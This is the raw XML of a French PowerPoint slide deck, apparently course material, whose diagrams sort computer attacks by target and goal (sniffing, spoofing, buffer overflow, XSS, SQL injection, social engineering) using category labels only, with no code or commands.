          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6524523" y="1478320"/>
        <a:ext cx="1934318" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{87971206-1DAA-4D32-9AA8-FFE6B5435848}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6524523" y="2215483"/>
          <a:ext cx="1934318" cy="58973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Active </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6524523" y="2215483"/>
        <a:ext cx="1934318" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0C925222-85D9-4FA0-970F-FA2CE89785D6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4203341" y="4058393"/>
          <a:ext cx="1934318" cy="58973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Selon l’objectif visé</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4203341" y="4058393"/>
        <a:ext cx="1934318" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{92DD9F99-3006-47F7-8658-24C9E55E3B23}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6524523" y="2952647"/>
          <a:ext cx="1934318" cy="58973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Interception </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6524523" y="2952647"/>
        <a:ext cx="1934318" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0F90E095-8BDC-4797-B045-C3AF1D09BB40}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6524523" y="3689811"/>
          <a:ext cx="1934318" cy="58973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Modification </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6524523" y="3689811"/>
        <a:ext cx="1934318" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7257408E-88DC-4C76-9EF9-1749F1553028}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6524523" y="4426975"/>
          <a:ext cx="1934318" cy="58973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Interruption  </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6524523" y="4426975"/>
        <a:ext cx="1934318" cy="589731"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CBF7161E-682D-4DD6-A55F-A08867982CA6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6524523" y="5164139"/>
          <a:ext cx="1934318" cy="58973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Fabrication </a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6524523" y="5164139"/>
        <a:ext cx="1934318" cy="5897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0D7D5-D366-4671-92B6-D1D719E538F0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5742530" y="2364306"/>
          <a:ext cx="840547" cy="560365"/>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Les attaques selon la  cible</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5758943" y="2380719"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2E453B0A-5E60-416D-B598-0423ED2E3DC4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1518778" y="2924671"/>
          <a:ext cx="4644025" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="4644025" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="4644025" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="22414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B66E43-9098-4595-AF67-DD33B79D2090}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1098505" y="3148817"/>
          <a:ext cx="840547" cy="56036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Les attaques réseaux</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1114918" y="3165230"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AA34B43D-E1E4-4E75-8AC3-861EEF03C561}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="426067" y="3709182"/>
          <a:ext cx="1092711" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1092711" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1092711" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="2241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E98AA3-A92D-4B0E-9322-6B64CD59A4E7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5793" y="3933328"/>
          <a:ext cx="840547" cy="56036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err="1" smtClean="0"/>
            <a:t>Sniffing</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22206" y="3949741"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CE7C8533-E956-4401-8D0C-37256E86059F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1473058" y="3709182"/>
          <a:ext cx="91440" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="2241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D4D1E5-7344-468B-85F9-341A24E52D14}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1098505" y="3933328"/>
          <a:ext cx="840547" cy="56036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IP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>spoofing</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1114918" y="3949741"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8F640D39-0CB4-42FD-A94A-B3C6D783A864}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1518778" y="3709182"/>
          <a:ext cx="1092711" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1092711" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1092711" y="2241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B854C6-B427-4A28-B992-417FBF0CA695}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2191216" y="3933328"/>
          <a:ext cx="840547" cy="56036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ARP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>poisonning</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2207629" y="3949741"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DAC7DE11-181D-4B5F-B252-2CDDFCB0DC6D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5343270" y="2924671"/>
          <a:ext cx="819533" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="819533" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="819533" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="22414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4760C8-5A54-4FEF-B8D8-E75E998F068C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4922996" y="3148817"/>
          <a:ext cx="840547" cy="56036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Les attaques applicatives</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4939409" y="3165230"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6270AAD4-3E05-4515-9D53-8BBD66B82DF3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3704202" y="3709182"/>
          <a:ext cx="1639067" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1639067" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1639067" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="2241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A690D0-4390-473E-882E-0EEBE5A1AFA6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3283928" y="3933328"/>
          <a:ext cx="840547" cy="56036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Buffer overflow</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3300341" y="3949741"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5A06BD60-8407-4785-AA27-DA00864963B7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4796914" y="3709182"/>
          <a:ext cx="546355" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="546355" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="546355" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="2241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5DA1F4-098C-4C6B-B37C-EF0C150B28C1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4376640" y="3933328"/>
          <a:ext cx="840547" cy="56036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Return to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>libc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Attack</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4393053" y="3949741"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E240553A-351E-44A5-BA8D-FB4CACAC4D91}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5343270" y="3709182"/>
          <a:ext cx="546355" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="546355" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="546355" y="2241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398953-CD98-4B82-832B-5A5E160C250B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5469352" y="3933328"/>
          <a:ext cx="840547" cy="56036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Format String </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>vulnerability</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5485765" y="3949741"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{59994F58-FFDA-4F5D-861D-90A4651667CB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5343270" y="3709182"/>
          <a:ext cx="1639067" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1639067" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1639067" y="2241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C9FFF8-A8C0-407E-AA99-2B95CB69E473}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6562063" y="3933328"/>
          <a:ext cx="840547" cy="56036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Race condition</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6578476" y="3949741"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B9A3B82B-FF69-4D50-AF52-579AB384566D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6162803" y="2924671"/>
          <a:ext cx="2458601" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2458601" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="2458601" y="22414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699C69-64E6-48CB-874B-4376AFC271BD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8201131" y="3148817"/>
          <a:ext cx="840547" cy="56036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Les attaques web</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8217544" y="3165230"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D3FE403F-2753-47F2-A4FE-411C05F322F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8075049" y="3709182"/>
          <a:ext cx="546355" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="546355" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="546355" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="2241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CDF8FA-4141-4148-9615-A5FA8A68B3EB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7654775" y="3933328"/>
          <a:ext cx="840547" cy="56036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Cross site </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>scripting</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7671188" y="3949741"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{27C3F04D-E00F-4DC4-87DE-6E08EA2ACAD1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8621405" y="3709182"/>
          <a:ext cx="546355" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="546355" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="546355" y="2241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B4E6F2-CEA7-4B1F-84A4-B8F3413E819B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8747487" y="3933328"/>
          <a:ext cx="840547" cy="56036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err="1" smtClean="0"/>
            <a:t>SQl</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> injection</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8763900" y="3949741"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CBB82E3A-2972-4968-9873-089649AE4944}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6162803" y="2924671"/>
          <a:ext cx="3551313" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="3551313" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="3551313" y="22414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B82C52-C414-4381-B295-3EA71A5EAFAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9293843" y="3148817"/>
          <a:ext cx="840547" cy="56036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Les attaques systèmes</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9310256" y="3165230"/>
        <a:ext cx="807721" cy="527539"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6CFE75AA-856E-4A5A-8F1B-28EDB8065F53}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6162803" y="2924671"/>
          <a:ext cx="4644025" cy="224146"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="4644025" y="112073"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="4644025" y="22414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AC40A8-2AD6-4833-8B5A-11F62650729D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10386555" y="3148817"/>
          <a:ext cx="840547" cy="56036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fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Les attaques par ingénierie sociale</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="10402968" y="3165230"/>
        <a:ext cx="807721" cy="5275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20A94-9E4D-4777-98E3-EE20F6417CA0}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17/06/2022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2FC47-4E15-4E8B-A891-A0AF041DE8C4}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3863011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1</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427240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12</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24076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13</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2955435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14</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3247970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15</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221651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16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3504260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17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2620091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18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="707793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19</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2627001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20</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
